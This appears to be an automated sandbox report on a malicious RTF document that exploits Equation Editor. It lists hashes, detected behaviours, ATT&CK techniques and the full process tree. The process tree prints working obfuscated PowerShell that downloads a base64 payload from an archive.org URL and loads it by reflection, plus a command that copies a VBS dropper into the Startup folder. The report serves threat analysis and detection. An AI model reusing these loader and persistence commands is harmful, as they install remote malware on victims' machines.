Analysis
-
max time kernel
120s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 07:04
Static task
static1
Behavioral task
behavioral1
Sample
59e879eb2a3f5f54db609e47b0596813.rtf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
59e879eb2a3f5f54db609e47b0596813.rtf
Resource
win10v2004-20240802-en
General
-
Target
59e879eb2a3f5f54db609e47b0596813.rtf
-
Size
118KB
-
MD5
59e879eb2a3f5f54db609e47b0596813
-
SHA1
103371a7186a337b2fe41038fac9c1a6519bc9bb
-
SHA256
a5f865743d2ac723fca850a9d3c48263afb8bed5016c38881da0358207d0cc44
-
SHA512
795962aeffb945341cf5ef0c17e5fa2c75c873e7cdd87fe23ffdfe464a0d0bd2508c4edfb3f82f1a28a03f0e92a172c5ad9b582bdc9c4905a90303a1dbbcb13a
-
SSDEEP
384:QOYaH2/aneItcw1TuB+mYwJ+QmDTH20aj2DO2gYnVD:TDUaJaw1T+4wJ+7FKSOknVD
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2360 EQNEDT32.EXE 6 2068 powershell.exe 7 2068 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1732 powershell.exe 2068 powershell.exe 1964 powershell.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2124 PING.EXE 3008 cmd.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2360 EQNEDT32.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2124 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2076 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1964 powershell.exe 1732 powershell.exe 2068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2076 WINWORD.EXE 2076 WINWORD.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2704 2360 EQNEDT32.EXE 31 PID 2360 wrote to memory of 2704 2360 EQNEDT32.EXE 31 PID 2360 wrote to memory of 2704 2360 EQNEDT32.EXE 31 PID 2360 wrote to memory of 2704 2360 EQNEDT32.EXE 31 PID 2704 wrote to memory of 3008 2704 WScript.exe 33 PID 2704 wrote to memory of 3008 2704 WScript.exe 33 PID 2704 wrote to memory of 3008 2704 WScript.exe 33 PID 2704 wrote to memory of 3008 2704 WScript.exe 33 PID 3008 wrote to memory of 2124 3008 cmd.exe 35 PID 3008 wrote to memory of 2124 3008 cmd.exe 35 PID 3008 wrote to memory of 2124 3008 cmd.exe 35 PID 3008 wrote to memory of 2124 3008 cmd.exe 35 PID 2076 wrote to memory of 2220 2076 WINWORD.EXE 36 PID 2076 wrote to memory of 2220 2076 WINWORD.EXE 36 PID 2076 wrote to memory of 2220 2076 WINWORD.EXE 36 PID 2076 wrote to memory of 2220 2076 WINWORD.EXE 36 PID 3008 wrote to memory of 1964 3008 cmd.exe 37 PID 3008 wrote to memory of 1964 3008 cmd.exe 37 PID 3008 wrote to memory of 1964 3008 cmd.exe 37 PID 3008 wrote to memory of 1964 3008 cmd.exe 37 PID 2704 wrote to memory of 1732 2704 WScript.exe 38 PID 2704 wrote to memory of 1732 2704 WScript.exe 38 PID 2704 wrote to memory of 1732 2704 WScript.exe 38 PID 2704 wrote to memory of 1732 2704 WScript.exe 38 PID 1732 wrote to memory of 2068 1732 powershell.exe 40 PID 1732 wrote to memory of 2068 1732 powershell.exe 40 PID 1732 wrote to memory of 2068 1732 powershell.exe 40 PID 1732 wrote to memory of 2068 1732 powershell.exe 40
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\59e879eb2a3f5f54db609e47b0596813.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2220
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingswithnewpcituresgetin.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\newthingswithnewpcituresgetin.vBS', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.adaloc.vbs')')3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 104⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Windows\system32\newthingswithnewpcituresgetin.vBS', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.adaloc.vbs')')4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbScrJ2hHdXJsJysnICcrJz0gU3BVaCcrJ3QnKyd0cCcrJ3MnKyc6Ly9pYTYnKycwMDEnKycwJysnMC51JysncycrJy5hcmNoaXYnKydlLm9yZycrJy8yNC9pdGVtJysncy8nKydkZXRhJysnaC0nKydub3RlLXYvRGUnKyd0YWhObycrJ3RlJysnVi4nKyd0eHRTJysncFU7JysnbWhHJysnYmEnKydzZTYnKyc0Q29udGUnKyduJysndCAnKyc9ICcrJyhOZXcnKyctT2JqJysnZWMnKyd0IFMnKyd5cycrJ3RlbS5OZScrJ3QuV2UnKydiQycrJ2xpZW50KS4nKydEJysnb3dubG9hJysnZCcrJ1MnKyd0cmluZygnKydtJysnaEcnKyd1cmwpO20nKydoR2JpJysnbmEnKydyeUNvbnRlbicrJ3QgJysnPSAnKydbU3lzdGVtLkNvbnZlJysncnQnKyddOjpGcm9tQmEnKydzZTY0UycrJ3QnKydyaW5nJysnKG0nKydoRycrJ2InKydhc2UnKyc2NENvbnQnKydlbnQnKycpO21oRycrJ2Fzc2VtYmwnKyd5ID0gW1JlZmxlY3RpbycrJ24uJysnQXMnKydzZW1iJysnbHldOjpMJysnb2EnKydkJysnKCcrJ21oR2JpJysnbmFyeUNvbnRlbicrJ3QpO21oJysnR3R5JysncGUnKycgPSBtaCcrJ0dhc3MnKydlbWJseS4nKydHZScrJ3QnKydUeXAnKydlKCcrJ1NwVScrJ1InKyd1JysnblBFLkhvbWVTJysncFUnKycpJysnO20nKydoR21lJysndGhvZCcrJyA9ICcrJ20nKydoR3R5JysncGUnKycuJysnR2UnKyd0TWV0aG8nKydkKFMnKydwJysnVVYnKydBSVNwVScrJyknKyc7bScrJ2hHbWV0JysnaCcrJ28nKydkLkludm9rJysnZScrJygnKydtaEdudWxsJysnLCcrJyBbb2InKydqZScrJ2N0W11dJysnQCcrJyhTcFV0eHQuT0NOJysnTkEvNTUzJysnLzM0MS42NDEnKycuMycrJy4yJysnOTEvJysnLycrJzpwdHRoJysnU3BVICwnKycgU3AnKydVJysnZGVzJysnYXRpdicrJ2EnKydkb1MnKydwVSAsIFNwVScrJ2RlcycrJ2EnKyd0aScrJ3ZhZG9TcFUgLCBTcCcrJ1UnKydkZXNhdGl2YScrJ2QnKydvJysnU3BVLFMnKydwVVInKydlZ0EnKydzbVNwVSxTJysncFVTcCcrJ1UnKycpKScpIC1DckVwbGFjZShbY2hBcl04MytbY2hBcl0xMTIrW2NoQXJdODUpLFtjaEFyXTM5IC1yRVBMQWNlJ21oRycsW2NoQXJdMzYpfC4gKCAkdmVSQk9TRVBSZWZlUmVOY2UudE9TVFJJbkcoKVsxLDNdKydYJy1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('m'+'hGurl'+' '+'= SpUh'+'t'+'tp'+'s'+'://ia6'+'001'+'0'+'0.u'+'s'+'.archiv'+'e.org'+'/24/item'+'s/'+'deta'+'h-'+'note-v/De'+'tahNo'+'te'+'V.'+'txtS'+'pU;'+'mhG'+'ba'+'se6'+'4Conte'+'n'+'t '+'= '+'(New'+'-Obj'+'ec'+'t S'+'ys'+'tem.Ne'+'t.We'+'bC'+'lient).'+'D'+'ownloa'+'d'+'S'+'tring('+'m'+'hG'+'url);m'+'hGbi'+'na'+'ryConten'+'t '+'= '+'[System.Conve'+'rt'+']::FromBa'+'se64S'+'t'+'ring'+'(m'+'hG'+'b'+'ase'+'64Cont'+'ent'+');mhG'+'assembl'+'y = [Reflectio'+'n.'+'As'+'semb'+'ly]::L'+'oa'+'d'+'('+'mhGbi'+'naryConten'+'t);mh'+'Gty'+'pe'+' = mh'+'Gass'+'embly.'+'Ge'+'t'+'Typ'+'e('+'SpU'+'R'+'u'+'nPE.HomeS'+'pU'+')'+';m'+'hGme'+'thod'+' = '+'m'+'hGty'+'pe'+'.'+'Ge'+'tMetho'+'d(S'+'p'+'UV'+'AISpU'+')'+';m'+'hGmet'+'h'+'o'+'d.Invok'+'e'+'('+'mhGnull'+','+' [ob'+'je'+'ct[]]'+'@'+'(SpUtxt.OCN'+'NA/553'+'/341.641'+'.3'+'.2'+'91/'+'/'+':ptth'+'SpU ,'+' Sp'+'U'+'des'+'ativ'+'a'+'doS'+'pU , SpU'+'des'+'a'+'ti'+'vadoSpU , Sp'+'U'+'desativa'+'d'+'o'+'SpU,S'+'pUR'+'egA'+'smSpU,S'+'pUSp'+'U'+'))') -CrEplace([chAr]83+[chAr]112+[chAr]85),[chAr]39 -rEPLAce'mhG',[chAr]36)|. ( $veRBOSEPRefeReNce.tOSTRInG()[1,3]+'X'-JoIN'')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD59fd26bc19f0349809d038f3d76dc3d50
SHA18db5b1ccd4aab76d431841ba7ead179514a50291
SHA256f7638b72bca8c0e033202bc8c0dd9c95d18b1de73ed9aa0895a51caca4e5bb3f
SHA512214312e8645ef8030db64a1aff1777f93b9815fe2ea40345f4a9e3d96f57173dc38836d04c51ae14780a38c8f6e7180a4c089fc7637e3e8b8a97fe763155b18d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD583ebe505627857486e2a7cd39b43ada6
SHA1fb0daf5c7224d85908923ccadfa9147c8c30e441
SHA256603de492620539fd9be0c04343eeba576d1216c6634ff7287c343730c3345e96
SHA5126771758a9713a34d0ce3a914b5bb90838d43da09080cc102d27073dbdb652bf6b5fec5030161a62237b2ca56e57b1c7481a9bd13c2ecc9212c3770a6573e5fed
-
Filesize
244KB
MD5b2d17f7a821d794153d6e01e0b1c3efa
SHA1d4ae22fcbad395c9c58f3cd3a1a384a1901ce64e
SHA25667e6bc221f892bd6299ae2d98cb607d68a51c174b87c2055c6b468bc4701df5a
SHA5124dbbd6b613d4bceca178d912ba483b1ee29ff492e6374c7d2d03d76e910bdff71674a1437b6cc28f0046a1ef22b5772db5353aa3993e4bd9df98d1b9401c16a6